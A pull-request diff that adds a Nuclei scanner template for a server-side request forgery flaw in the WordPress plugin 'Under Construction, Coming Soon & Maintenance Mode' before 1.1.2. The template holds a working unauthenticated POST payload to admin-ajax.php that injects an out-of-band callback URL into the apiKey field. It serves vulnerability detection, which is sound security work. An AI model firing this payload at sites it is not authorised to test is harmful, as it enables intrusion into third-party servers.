Merge pull request #4348 from projectdiscovery/wp-under-construction-ssrf
Create wp-under-construction-ssrf.yamlpatch-1
commit
892739714b
|
@ -0,0 +1,30 @@
|
||||||
|
id: wp-under-construction-ssrf
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Under Construction, Coming Soon & Maintenance Mode < 1.1.2 - Server Side Request Forgery (SSRF)
|
||||||
|
author: Akincibor
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
The includes/mc-get_lists.php file used the 'apiKey' POST parameter to create an https URL from it without sanitisation and called it with cURL, leading to a SSRF issue. The issue is exploitable via direct access to the affected file, and ucmm_mc_api AJAX call (available to both authenticated and unauthenticated users).
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/24784c84-3efd-4166-81c1-e5a266562cfc
|
||||||
|
- https://packetstormsecurity.com/files/161576/
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: ssrf,wp,wp-plugin,wordpress,unauth
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-admin/admin-ajax.php HTTP/2
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Origin: {{BaseURL}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
action=ucmm_mc_api&apiKey=-{{interactsh-url}}%2Ftest%2Ftest%2Ftest%3Fkey1%3Dval1%26dummy%3D
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
|
words:
|
||||||
|
- "http"
|
Loading…
Reference in New Issue